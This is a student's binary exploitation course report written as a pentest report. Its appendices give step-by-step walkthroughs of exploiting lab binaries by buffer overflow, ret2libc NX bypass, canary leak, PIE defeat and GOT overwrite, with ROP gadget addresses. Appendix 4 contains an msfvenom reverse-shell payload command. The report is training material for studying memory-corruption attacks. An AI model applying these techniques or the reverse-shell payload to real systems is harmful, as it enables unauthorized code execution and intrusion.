# Binary Exploitation Author: Lang Ngo Date: March 16, 2024 --- ## Table of Contents - [[#Binary Exploitation]] - [[#Executive Summary]] - [[#Use of this Document]] - [[#Synopsis]] - [[#Scope of Work]] - [[#Vulnerability Findings]] - [[#Summary of Findings]] - [[#Stack Based Buffer Overflow]] - [[#Format String]] - [[#Appendix]] - [[#Appendix 1]] - [[#Appendix 2]] - [[#Appendix 3]] - [[#Appendix 4]] - [[#Appendix 5]] - [[#Appendix 6]] - [[#Appendix 7]] - [[#Appendix 8]] - [[#Appendix 9]] - [[#Appendix 10]] - [[#Appendix 11]] # Executive Summary ## Use of this Document This report is intended to provide detail and context on security issues discovered during Binary Exploitation Course. This report provides technical descriptions and security weaknesses found on the exercise and course materials provided. ## Synopsis For training and learning purposes, the binary exploitation testing engagement aimed to assess the security of the target's binary applications. It involved identifying vulnerabilities and potential attack vectors to evaluate the binary applications' resilience against malicious activities. The testing focused on uncovering weaknesses in the binary applications' design, implementation, and configurations that could lead to unauthorized access, data breaches, or other security incidents. Engagement of the exercises was performed by Lang Ngo. The report will focus on security vulnerabilities, exploits, and mitigation; all within the training environment. It will include issues with security, vulnerabilities and recommendations of the testing environment. All vulnerabilities found were intentional and for demonstration purposes. ## Scope of Work All following vulnerabilities were conducted within various binaries, on the same linux server. ## Vulnerability Findings The severity for each finding is measured based on CVSS Version 4.0 metrics: https://www.first.org/cvss/calculator/4.0 # Summary of Findings | Vulnerability | Severity | CVSS Score | |--------------|-----------|------------| | Stack Based Buffer Overflow | High | 7.6 | | Format String | High | 7.6 | # Stack Based Buffer Overflow | Field | Value | | ------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | Vulnerability | Stack Based Buffer Overflow | | CVSS Score | 7.6 | | Severity | High | | CVSS URL | CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N | | Target | https://34.238.235.168 | | Impact | The discovery of a buffer overflow vulnerability within multiple binary files on the target system signifies a critical security risk. This class of vulnerability allows an attacker to execute arbitrary code on the affected system by overrunning the buffer's boundary and injecting malicious code into the stack. <br><br>The specific binaries identified (ret2win, ret2win_params32, ret2win_params64, buffer_overflow, buffer_overflow64, bypass_nx, bypass_nx64) indicate a widespread susceptibility to buffer overflow attacks across different architectures and configurations. <br><br>Successful exploitation could lead to unauthorized system access, confidentiality breach, integrity compromise, and availability impact. Given the nature of the affected binaries, an attacker could potentially leverage this vulnerability to gain elevated privileges, disrupt critical processes, or deploy additional payloads, posing significant risk to the target environment's security posture. | | Details | ret2win, ret2win_params32, ret2win_params64, buffer_overflow, buffer_overflow64, bypass_nx, bypass_nx64 | | Reproduction Steps | Appendix 001 - 007 | | Recommendation | To mitigate the identified buffer overflow vulnerabilities, the following recommendations are proposed: <br><br>Immediate Patching: Update the affected binaries with the latest patches provided by the software developers or vendors. If patches are not available, consider replacing or disabling the vulnerable binaries. <br><br>Input Validation: Implement strict input validation checks to ensure only expected data is processed by the affected binaries. <br><br>Memory Protection Mechanism: Enable memory protection mechanisms, such as Address Space Layout Randomization (ASLR) to make exploitation more difficult. <br><br>Code Review and Static Analysis: Conduct a thorough code review and utilize static analysis tools to identify and remediate buffer overflow vulnerabilities in custom-developed binaries. <br><br>Security Training: Educate development and security teams on secure coding practices and the risks associated with buffer overflows. | | References | - https://owasp.org/www-community/vulnerabilities/Buffer_Overflow <br>- https://cwe.mitre.org/data/definitions/121.html | --- # Format String | Field | Value | | ------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | Vulnerability | Format String | | CVSS Score | 7.6 | | Severity | High | | CVSS URL | CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N | | Target | https://34.238.235.168 | | Impact | The discovery of a Format String vulnerability within the binary files format_strings, bypass_canary, and got_overwrite presents a significant security risk. <br><br>This vulnerability allows attackers to read from or write to memory locations of a vulnerable application, leading to unauthorized access, data corruption, or even the execution of arbitrary code. Exploitation can compromise the confidentiality, integrity, and availability of the system, posing a direct threat to the security posture of the target environment. <br><br>Given the nature of this vulnerability, attackers could potentially leverage it to escalate privileges, manipulate system functionalities, or disrupt critical services, underlining the urgent need for remediation. | | Details | format_strings, bypass_canary, got_overwrite | | Reproduction Steps | Appendix 008 -011 | | Recommendation | Immediate Update and Patching: Apply all available security patches for the vulnerable binaries. If no patch is available, consider removing or restricting access to the affected binaries. <br><br>Code Review and Sanitization: Perform a comprehensive code review of the vulnerable binaries, focusing on input validation and sanitization. Ensure that format string outputs are properly sanitized to handle user-supplied input securely. <br><br>Security Awareness: Educate developers on the risks associated with format string vulnerabilities and encourage secure coding practices to prevent similar vulnerabilities in the future. | | References | - https://owasp.org/www-community/attacks/Format_string_attack <br>- https://www.infosecinstitute.com/resources/secure-coding/how-to-mitigate-format-string-vulnerabilities/ <br>- https://www.geeksforgeeks.org/format-string-vulnerability-and-prevention-with-example/ | --- # Appendix ## Appendix 1 ```bash file ret2win ``` ![[Attachments/3b8c3e2ee60393bdfcd83a0d1f4118e2_MD5.png]] Ran the program as a regular user to find out normal functionality ```bash ./ret2win ``` ![[Attachments/e3e75dec31c716c5c2f51723f31becf6_MD5.png]] checking the binary file with checksec ```bash checksec --file=ret2win ``` ![[Attachments/c540f311fcf97d860fa5289fbe8950a7_MD5.png]] copy files from the lab machine to local machine ```bash scp -i "ssh-key.pem" [email protected]:/opt/Bin_Exp_Workshop/2_Ret2Win/ret2win ret2win ``` ![[Attachments/1adacab11261f2808936ddec454cd989_MD5.png]] launch and open the ret2win binary in idafree ![[Attachments/c033b8d63f38cc5b07afc733620a50dc_MD5.png]] The ret2win binary contains a deleteThis function which is vulnerable. ![[Attachments/d4d859582389915b85bb025c63048fac_MD5.png]] Reviewing the pseudocode for the login function shows limit of 20 characters for input. ![[Attachments/c996a1667d6877b67dd131271421db65_MD5.png]] Further testing shows that entering more than 20 characters crashes the program, a buffer overflow. ![[Attachments/0fdfcfde6d7054fc5ba2699693bce975_MD5.png]] Used a debugger tool to check the flow of the ret2win program. ```bash gdb-pwndbg ret2win ``` ```bash info functions ``` ![[Attachments/2dca4d3882fb809734070d58806f24a9_MD5.png]] Running the program in the debugger to figure out the point of the crash. Using 100 characters of A. ```bash r ``` ![[Attachments/0887421d98cbd38e10c8243cf633cf31_MD5.png]] debugger shows that EIP address is overwritten with the AAAA. Determine where the the EIP is getting overwritten using: ```bash cyclic 200 ``` ![[Attachments/1710c841e1398dc68123de20c7a254f9_MD5.png]] ```bash cyclic -l 'haaa' ``` Found the offset 28, which means username takes in 28 charactesr, and the next 4 bytes can be used for the EIP address ![[Attachments/19b3242f21f974c785c4c7ec93cb5266_MD5.png]] Use python to test the theory. ```bash python3 -c 'print("A"*28+"B"*4+"C"*16)' ``` ![[Attachments/ecf17b5c38275c2596a25b17dfe4b922_MD5.png]] copy the template.py file to the local machine. ```bash scp -i "ssh-key.pem" [email protected]:/opt/Bin_Exp_Workshop/2_Ret2Win/template.py template.py ``` ![[Attachments/b8ff23b6e31640588a835b8a62ecb6b9_MD5.png]] make a copy of the template.py exploit to exploit the ret2win binary, call it exploit.py ```bash cp template.py exploit.py ``` ```bash vim exploit.py ``` edit the exploit so that exe = './ret2win' and padding = 28 and the EIP instruction is to the deleteThis function with b'\x86\x91\x04\x08' ![[Attachments/edb639e4c868aa1852dda9326d1c407c_MD5.png]] After editing the exploit.py command , run the exploit: ```bash python3 exploit.py ``` ![[Attachments/224a4b941bb5a87a8790f93a31d4620f_MD5.png]] The ret2win binary has been successfully exploited. ## Appendix 2 ```bash file ret2win_params32 ``` ![[Attachments/ef228c4cd7f68b594bce867235af3a65_MD5.png]] ```bash ./ret2win_params32 ``` ![[Attachments/d8bebfbe5f39547f0fa6ff0909f1b7b5_MD5.png]] ```bash checksec --file=ret2win_params32 ``` ![[Attachments/c9f08dc728835dfeda0cb45a840b0e9c_MD5.png]] ```bash gdb-pwndbg ret2win_params32 ``` ![[Attachments/7bc6a5c58edfd854ef62026fa168bf8d_MD5.png]] ```bash disass deleteThis ``` this deletethis function passes two arguments , 0xdeadbeef, 0x1337c0de ![[Attachments/8f84cac6df32912ca7f87994ec76db2c_MD5.png]] This deleteThis function can also be viewed in IDA ![[Attachments/b08b4e412fe332cd79a7112782d459fd_MD5.png]] Determine the offset, pwndbg ```bash cyclic 200 ``` ```bash r ``` ![[Attachments/dceb41bee8f798a92fb895fb3efe7e25_MD5.png]] find the offset ```bash cyclic -l 'haaa' ``` ![[Attachments/a852c06d36cfb5fcbb1c761118c78a60_MD5.png]] test the offset ```bash python3 -c 'print("A"*28+"B"*4+"C"*16)' ``` ![[Attachments/0edf10c6181d59a0c0eb878a2986120a_MD5.png]] edit the exploit so that exe = './ret2win_params32' and padding = 28, and adding the parameters ![[Attachments/e75eada0eae61b236a7571f1d0aed9d1_MD5.png]] run the exploit ```bash python3 exploit32.py ``` ![[Attachments/2916c3cc5dc97f83a50bc26b579b4fba_MD5.png]] Successful exploitation of ret2win_params32 ## Appendix 3 check the properties of the ret2win_params64 binary using the file command ```bash file ret2win_params64 ``` ![[Attachments/2fa82a8b4a5313da532d89c1245d89a5_MD5.png]] purpose of this is to check and see if the binary is 32 bit or 64 bit and if it is stripped or not stripped run the binary as a basic user ```bash ./ret2win_params64 ``` ![[Attachments/dd493d6e6cb1d8a3c0190cafd93e4595_MD5.png]] get more info about the binary using gdb-pwndbg ```bash gdb-pwndbg ret2win_params64 ``` ![[Attachments/fc55eab32fdc3b250d58903d79817dc0_MD5.png]] get the values of the parameters in the function Hacked/deleteThis ```bash disass hacked ``` The values are: 0xdeadbeefdeadbeef and 0xc0debabec0debabe figure out the padding ```bash cyclic 200 ``` ![[Attachments/95094e9524ee0b62d0be6f441e4de9ba_MD5.png]] ```bash cyclic -l daaaaaa ``` offset found at 24 ![[Attachments/7eb3a3e0237add3047475d3bec8e36bb_MD5.png]] test the 24 offset ```bash python3 -c 'print("A"*24+"B"*8+"C"*16)' ``` ![[Attachments/c72f463d7eb3644870272a306bca6924_MD5.png]] Find the gadgets ```bash ropper --file ret2win_params64 --search "pop rdi" ``` copy the pop rdi gadget 0x000000000040124b ![[Attachments/19ffe232bb84dec5d0e13efaebc48bf1_MD5.png]] Get the pop rsi ```bash ropper --file ret2win_params64 --search "pop rsi" ``` copy the pop rsi + pop r15 gadget 0x0000000000401249 ![[Attachments/ab8d4d32fddb6ebcf9aaa9e75c796cb4_MD5.png]] edit the exploit64.py file ![[Attachments/daf4ab2b5cb7217af30e0d659290f47e_MD5.png]] Run the exploit ```bash python3 exploit64.py ``` ![[Attachments/a2018cd7e979a492582024b112fa520b_MD5.png]] ## Appendix 4 Check the file properties of the buffer_overflow binaries ```bash file buffer_overflow* ``` ![[Attachments/39b1351afcef2c1e5fec930f9b520ae4_MD5.png]] run the binary/program like a normal user ```bash ./buffer_overflow ``` ![[Attachments/469ae080a1c6deb7dd71c5068415a7d0_MD5.png]] use debugger to get the list of functions from the binary ```bash gdb-pwndbg buffer_overflow ``` ![[Attachments/1fb47084f9dd6a007f064a594470df44_MD5.png]] disassemble the main and receive_feedback functions, secret_function, and discover that the receive_feedback functions uses vunerable c library gets ![[Attachments/281ec0baaba5518f1e570ae2473aecfa_MD5.png]] ![[Attachments/f2b16266bf5b21aec05fdac407047613_MD5.png]] dissassemble of the secret_function shows that a jump gadget is provided. ![[Attachments/48e3df8e79520bbe0534e0aab53efb2a_MD5.png]] figure out how much data to send to the program to bufferflow ```bash cyclic 200 ``` ![[Attachments/c6acdd71742ed2e835a0b13f35f089b2_MD5.png]] ```bash r ``` after running the program, it shows that the program crashes at "taaa" ![[Attachments/ad4c0b62c45083c0f88c207fa7ec8d35_MD5.png]] get the offset with: ```bash cyclic -l taaa ``` offset found at 76 ![[Attachments/99fbd2ffb2596c9fecd26146f51259fd_MD5.png]] test the offset ```bash python3 -c 'print("A"*76+"B"*4+"C"*16)' ``` run the debugger again, and paste the values generated from the python3 command, and check if the bufferoverlow of 76 is correct. ```bash r ``` ![[Attachments/78ac1854ee43fc98a5c0815fae16d41b_MD5.png]] exploit.py will have code shellcraft.cat to read the flag.txt edit the exploit.py = padding + jmp_esp + nops +shellcode ![[Attachments/a9ca7c1cff7c77806a85bc1009a9e092_MD5.png]] run the exploit ```bash python3 exploit32.py ``` successful reading of the flat.txt file ![[Attachments/c8160590ff61a81484328d3b069405f1_MD5.png]] It is also possible to create a reverse shell using the "shellcode = asm(shellcraft.sh()) Another method to create a reverse shell is to use msfvenom to create the reverse shell code ```bash msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b '\x00' -f python ``` Then edit the exploit.py file to use the generated code ![[Attachments/7174f7633beacacad56ed7bbbd8d8050_MD5.png]] buffer_overflow64 bit version ```bash file buffer_overflow64 ``` ![[Attachments/b6c67f5128d5b50b3d79da2b768917da_MD5.png]] Run checksec to find what protections are on this binary ```bash checksec --file=buffer_overflow64 ``` No protections were found ![[Attachments/05760f04ff9914ca190ee69a7a8c3fc5_MD5.png]] run the binary as normal ```bash ./buffer_overflow64 ``` ![[Attachments/ace56426c30e0b10ee0164acfcaadc28_MD5.png]] use debugger to get the list of functions from the binary ```bash gdb-pwndbg buffer_overflow64 ``` ```bash info functions ``` ![[Attachments/61f6b0e60600b096985ddfc14e0ed6ea_MD5.png]] lets disassemble the receive_feedback function ```bash disass receive_feedback ``` ![[Attachments/76bafa4ada277640d274fd57393fae9d_MD5.png]] the gets library is vulnerable to buffer overflow, see man gets use IDA to also view and dissassemble the binary and see receive_feedback ![[Attachments/9ff941ee711f5e328c7752fc17414b9d_MD5.png]] find out how many bytes required to get the buffer overflow using gdb-pwnbdg ```bash gdb-pwndbg buffer_overflow64 ``` ```bash cyclic 200 ``` copy the output ```bash r ``` paste the 200 characters ![[Attachments/3e98965c298b9897310a20e78b681334_MD5.png]] get the offset with the 8 characters ![[Attachments/4c0f80898c8035c83a26a7b4842932de_MD5.png]] ```bash cyclic -l 'jaaaaaaa' ``` Found offset at 72 ![[Attachments/4c0f80898c8035c83a26a7b4842932de_MD5.png]] Basically means we need to provide 72 bytes of junk, in order to highjack the RIP. edit the exploit for the 64 bit version 1. changed to buffer_overflow64, 2. changed padding to 72, 3. changed jmp_esp to jmp_rsp, 4. changed jmp_esp to jmp_rsp ![[Attachments/ddd22d1ed04052a6c05acb3983fed583_MD5.png]] run the exploit with python ```bash python3 exploit64.py ``` successful exploitation of buffer_overflow64 ![[Attachments/9cb0803148fd15c6bbccb1ebbf94b651_MD5.png]] flag.txt was readable and is: flag{w417_h0w_d1d_y0u_d0_7h47} ![[Attachments/82d0160bb32a91e029293af36759a556_MD5.png]] ## Appendix 5 Stripped Binary ```bash file stripped_binary ``` the file command shows that the binary is stripped ![[Attachments/a483e9d48a43341693692f0314815611_MD5.png]] using debugger like gdb-pwndbg will not show any information on the functions because the binary is stripped. ![[Attachments/d1c70515f4aa6c2dccc0ddd6ae9c01d0_MD5.png]] ## Appendix 6 Bypass NX run file and checksec to get the binary properties NX is enabled ![[Attachments/8bb46e78afa5a9b8161c17f05f44871a_MD5.png]] run the program as a user to see the normal functionality ```bash ./bypass_nx ``` ![[Attachments/d50c4d7b2c91f5ae54e2db8823c7b452_MD5.png]] user debugger tool to get information on the functions ```bash gdb-pwndbg bypass_nx ``` ![[Attachments/e57c554b2fd5a514eed172dd07fbade3_MD5.png]] lets disassemble the receive_feedback function ```bash dissass receive_feedback ``` the function is same vulnerable function. NX makes using the exploit harder, but doesn't fix the vulnerability of the binary. ![[Attachments/4e53706686ee294b05e41546fc2a0d96_MD5.png]] To by paxx NX, we need to bypass it using dependencies, because this code relies on standard c library anytime you see a @plt it is getting the code from somewhere else, in this case standard c library Most standard libraries have functions that run system commands Run cyclic 200 to figure out the offset ```bash gdb-pwndbg bypass_nx ``` ```bash cyclic 200 ``` ```bash r ``` paste the 200 characters ![[Attachments/f5299491ed054272be11708b9f63e48c_MD5.png]] ```bash cyclic -l 'taaa' ``` offset at 76 ![[Attachments/3655b688d558cfa353113a72c198b10a_MD5.png]] use man ldd to find the specific addresses of the shared c dependencies ```bash ldd bypass_nx ``` ![[Attachments/fcc4620d78306db7be73567f9bf0ef97_MD5.png]] the libc dependancy is in the 0xf7c00000 Now find the system offset address from the base libc address ```bash readelf -s /lib/i386-linux-gnu/libc.so.6 |grep system ``` address of the system address is : 0004c880 ![[Attachments/3d767d7a939ae5a26b828bfc4cbcdf98_MD5.png]] now find address for /bin/sh ```bash strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 |grep "/bin/sh" ``` address of /bin/sh is 1b5fc8 ![[Attachments/5653ea2f094bbad05ff30b75f7be66f2_MD5.png]] edit the exploit file with the relevant addresses ![[Attachments/6646f1f4dcfea42eebec9a5a7da7d304_MD5.png]] run the exploit ```bash python3 exploit.py ``` successful expoitation of bypass_nx binary ![[Attachments/c65ea64f17029b97ba026a791efc8de3_MD5.png]] ## Appendix 7 run file, checksec, and debugger to get more info on bypass_nx64 ```bash file bypass_nx64 ``` Note 64bit, dynamically linked, and not stripped ![[Attachments/3a46fa1d0450a26a645ed5c646f38945_MD5.png]] ```bash checksec --file=bypass_nx64 ``` NX is enabled ![[Attachments/65e448d18480779186531561f0cbf88c_MD5.png]] run binary as normal to understand how it works ```bash ./bypass_nx64 ``` ![[Attachments/96c9a541b5bfe4064593e1596d517201_MD5.png]] use debugger to get the list of functions from the binary ```bash gdb-pwndbg bypass_nx64 ``` ```bash info functions ``` ![[Attachments/9db38498507a775c37c15b1d7bfaeca1_MD5.png]] ```bash dissass receive_feedback ``` ![[Attachments/5798fa990226df79ce16f9b4dcae3f8f_MD5.png]] Another method is to open in IDA. ![[Attachments/d04254d624dc9b657caaf7132aace83c_MD5.png]] Get the padding using cyclic ```bash cyclic 200 ``` ![[Attachments/67a3306ca2e84ff97934f9e1efa79c30_MD5.png]] ```bash cyclic -l 'jaaaaaaa' ``` Found offset at 72 ![[Attachments/717ec95caa265663ded2517511d07b50_MD5.png]] Run ldd to get the address for lib.c base address ```bash ldd bypass_nx64 ``` The libc base address is: 0x00007ffff7fc9000 ![[Attachments/c6cfe8cc65cbfdbf3e82e92e308feedf_MD5.png]] ```bash readelf -s /lib/x86_64-linux-gnu/libc.so.6 |grep system ``` the system address is: 000000000004c920 ![[Attachments/c05748f2166d815bdf32f5c872d69409_MD5.png]] ```bash strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 |grep "/bin/sh" ``` the address for /bin/sh is: 19604f ```bash ropper --file bypass_nx64 --search "pop rdi" ``` the pop rdi gadget address is: 0x000000000040120b ![[Attachments/8510e77ae9e9bc1fedc4eef67afca325_MD5.png]] ```bash ropper --file bypass_nx64 --search "ret" ``` return gadget address is: 0x0000000000401016 ![[Attachments/b8350822e6ee09e5a747445fb9c11ba0_MD5.png]] edit the exploit ![[Attachments/c69628af24621857219f498d1fb041b7_MD5.png]] ```bash python3 exploit64.py ``` ![[Attachments/1abb905d354b8864076156e07cfc9c28_MD5.png]] ## Appendix 8 Format Strings Binary let's run file and checksec to get the basic info about the binary file ```bash file format_strings ``` ```bash checksec --file=format_strings ``` ![[Attachments/8311b35f688899feb66e68eaa37fc90e_MD5.png]] run the binary as normal user ```bash chmod +x ./format_strings ``` ```bash ./format_strings ``` With %x (formating strings) the stack is leaked ![[Attachments/bd2f71dee106058ebece3275ba7d11bd_MD5.png]] run debugger on format_strings ```bash gdb-pwndbg format_strings ``` ```bash info functions ``` ![[Attachments/b5937ef6a5398a42ee48802e7de318cb_MD5.png]] ```bash dissass main ``` ![[Attachments/4e51e0f2b1f4eb7594a75c85dea70901_MD5.png]] ![[Attachments/283abd7296090f7717ae35c6f3a8d9ed_MD5.png]] ![[Attachments/338603cb6ea65fe9e676f220d1c301c1_MD5.png]] Here is the disassembled main function in IDA ![[Attachments/06b3c4305c8294041482713ec5fbb3f9_MD5.png]] Shows the binary is vulnerable to format strings, but not buffer overflow. Use pwntools to fuzz the leaked stacked information. use the fuzz_format_strings.py ![[Attachments/be98853112d4df35642ecce467c15b2c_MD5.png]] ```bash python3 fuzz_format_strings.py ``` ![[Attachments/5c1cb95429f81ef4f10c5a39e3d20ae0_MD5.png]] ## Appendix 9 bypass_canary binary use commands file and checksec to get info about the binary ```bash file bypass_canary ``` ```bash checksec --file=bypass_canary ``` ![[Attachments/a6caf4106f8636d99f1c6c6eb8e12d7f_MD5.png]] run the program as a user to see the normal functionality ```bash ./bypass_canary ``` ![[Attachments/cfd69fa6fbc2c7c2f812872e7c975c3b_MD5.png]] open binary in debugger ![[Attachments/a725ab64fe9cf1173553643d3a861d04_MD5.png]] ![[Attachments/87df8aa53174296a393fa4de34546f1f_MD5.png]] printf is used in the vuln function, so we can use format strings to print out the stack info running the file and entering %p %p %p returns stack info ![[Attachments/149f223dd34f30ff0097688bf47186a4_MD5.png]] use fuzz_canary.py to get more stack info ![[Attachments/47cd8993379b0da76f5b1606349be070_MD5.png]] ```bash python3 fuzz_canary.py ``` possible stack canaries found with address that end in 00 ![[Attachments/ac070be4cad4272fd321bc95bc56ce7b_MD5.png]] Run python3 fuzz_canary.py and see if addresses that end in 00 change, possibility it is stack canary increases ![[Attachments/beb75e05be34b4bc8013d540a8cde274_MD5.png]] gdb-pwndbg debugger has a canary function to help ```bash gdb-pwndbg bypass_canary ``` set a breakpoint in vuln function ```bash info functions ``` ```bash disass vuln ``` set breakpoint at the subtraction ```bash b * 0x08049250 ``` ![[Attachments/6e900fb18fc6c3168a24da6402d5fa38_MD5.png]] ```bash r ``` Enter aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa to overflow and then hit enter again to trigger breakpoint ```bash canary ``` ![[Attachments/4a639dad8018df934f4c8cf23a7d1127_MD5.png]] This means we know that stack canary will be at 24 element in location in the stack, or 23 in our python script. ![[Attachments/1b64709f8e7185dd8afcf72029fa6d2f_MD5.png]] use exploit _canary.py ![[Attachments/79c9f720cb71e33b3876981f4838a189_MD5.png]] ```bash python3 exploit_canary.py ``` exploit successful in bypass canary using format strings ![[Attachments/35ed4602fde69b5fdc81304adaf6cd20_MD5.png]] ## Appendix 10 PIE Get file and checksec information from the binary. ```bash file defeat_pie ``` ```bash checksec --file=defeat_pie ``` ![[Attachments/2b04c38512db5c0ce06c264644873ae9_MD5.png]] run the program as a user to see the normal functionality ```bash ./defeat_pie ``` if aslr is turned off the functionality of defeat_pie shows the main function is at: 555555555159 ![[Attachments/a76302a95fc41d9b18367b594d3e0fdc_MD5.png]] With PIE turned on debugging the binary will show offsets instead of specific function addresses ```bash gdb-pwndbg defeat_pie ``` ![[Attachments/514c3094869a999838e3b8bfa887dc21_MD5.png]] use piebase after running the binary to get the base address for the binary and then add them together to get the real address for the functions ```bash info functions ``` set breakpoint at the win function address of 0x00000000000011a8 ```bash b *0x00000000000011a8 ``` ```bash r ``` ![[Attachments/3962fbf4485e04d9c940c4f6254bb3f1_MD5.png]] ```bash piebase ``` take the base address and added to the offset to get the address of the win function ```bash x 0x555555554000 + 0x11a8 ``` Win function address is 0x5555555551a8 ![[Attachments/9351b6d88220b68d2806173a85a10fac_MD5.png]] Find more info and verify the address with x/i to figure out it is an instruction pointer ```bash x/i 0x5555555551a8 ``` ![[Attachments/ff513b5b425eeb4e94b56ef84811c1c3_MD5.png]] find the offset needed to insert exploit code ```bash gdb-pwndbg defeat_pie ``` ```bash cyclic 200 ``` copy the output aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa ```bash r ``` paste the 200 characters ![[Attachments/d458c1390490d6ec97e2a66a8e60388b_MD5.png]] ![[Attachments/3b8da7b8506e7fe5fdf27c3075199542_MD5.png]] ```bash cyclic -l faaaaaaa ``` Offset is 40 ![[Attachments/15088d375295dbae03e8ea0f0fffdc1a_MD5.png]] edit the exploit.py ![[Attachments/370a197d51515bb37e3099731b30c43d_MD5.png]] How the exploit works basically, is it gets a leaked address and then we calculate the binary's address by subtracting it from the offset. Now that we know main address of the binary we can run the win function. ```bash python3 exploit.py ``` defeat_pie binary successfully exploited ![[Attachments/07e365c55c6d6b8ae4a6ab0bc2d9dfae_MD5.png]] ## Appendix 11 Got_Overwrite Let's run the commands file and checksec to get more info on the binary got_overwrite ```bash file got_overwrite ``` 32 bit binary, dynamically linked, and not stripped. ![[Attachments/a6a5effbb8e03a3eb0a507ed1abb855a_MD5.png]] ```bash checksec --file=got_overwrite ``` Canary found and NX enabled ![[Attachments/c4f18723fda213f0293a1d685585b43b_MD5.png]] check and see if ASLR is turned on the system ```bash cat /proc/sys/kernel/randomize_va_space ``` result is 0, which means ASLR is disabled, which confirms static addresses for libc library ```bash ldd got_overwrite ``` ![[Attachments/608eb632b0279ff6631d80b8c311dab5_MD5.png]] run the binary as normal user ```bash ./got_overwrite ``` binary echos input data. Also format strings leak found with %x ![[Attachments/40752495ab006a32f727a6ef459ad5f1_MD5.png]] run the debugger to get more info ```bash gdb-pwndbg got_overwrite ``` ```bash info functions ``` ![[Attachments/5eb425f53dbbcb22823f2c98b586e382_MD5.png]] ```bash disass main ``` ![[Attachments/35cfe921dee17ee1e4c7509540668c73_MD5.png]] ```bash disass vuln ``` ![[Attachments/01470b016c121b3779c7d1f24657359c_MD5.png]] Let's also open the binary in ida and get the pseudocode to better understand the flow of the vuln function ![[Attachments/32e95f7fcf6e30ca3293d79bf4d590b7_MD5.png]] shows that there is a format string vulnerability, as the type of format string is not declared, for example, %s for strings shift + f7 to open up the segments window in IDA double click on .got.plt ![[Attachments/ea7b153af6cde4ca31232667d6f56e92_MD5.png]] Highlighted sections are the offset of the libc functions ![[Attachments/94af39249e9f061ff3bff7cb378741e1_MD5.png]] Use the arbitrary write from format strings to write /bin/sh system to get reverse shell fuzz the got_overwrite binary to figure out the leak ```bash vim fuzz.py ``` here is the fuzz.py ![[Attachments/3b975cfc2bf8985abe158ac1b42d4369_MD5.png]] lets run the fuzz script ```bash python3 fuzz.py ``` Our user input is at index 4 line, which is 78243425, you can unhex it to see the user input ![[Attachments/2bd2a55799e33f415bbe4d1ea1a44eb1_MD5.png]] ```bash !unhex 78243425 ``` ![[Attachments/f4b37e7cd30da6122176bf640c4a3768_MD5.png]] plan of attack for exploit -use the string vulnerability -use %n specifier to overwrite the printf function from the GOT with the address of the system function from libc here is the exploit.py ![[Attachments/dee08d0cb2ee3ed89801a42aed2f4e77_MD5.png]] ```bash python3 exploit.py ``` exploit succesful and root access gained ```bash cat flag.txt ``` ![[Attachments/4d626f88bb8b488ba7a6b1a8fc1eac25_MD5.png]]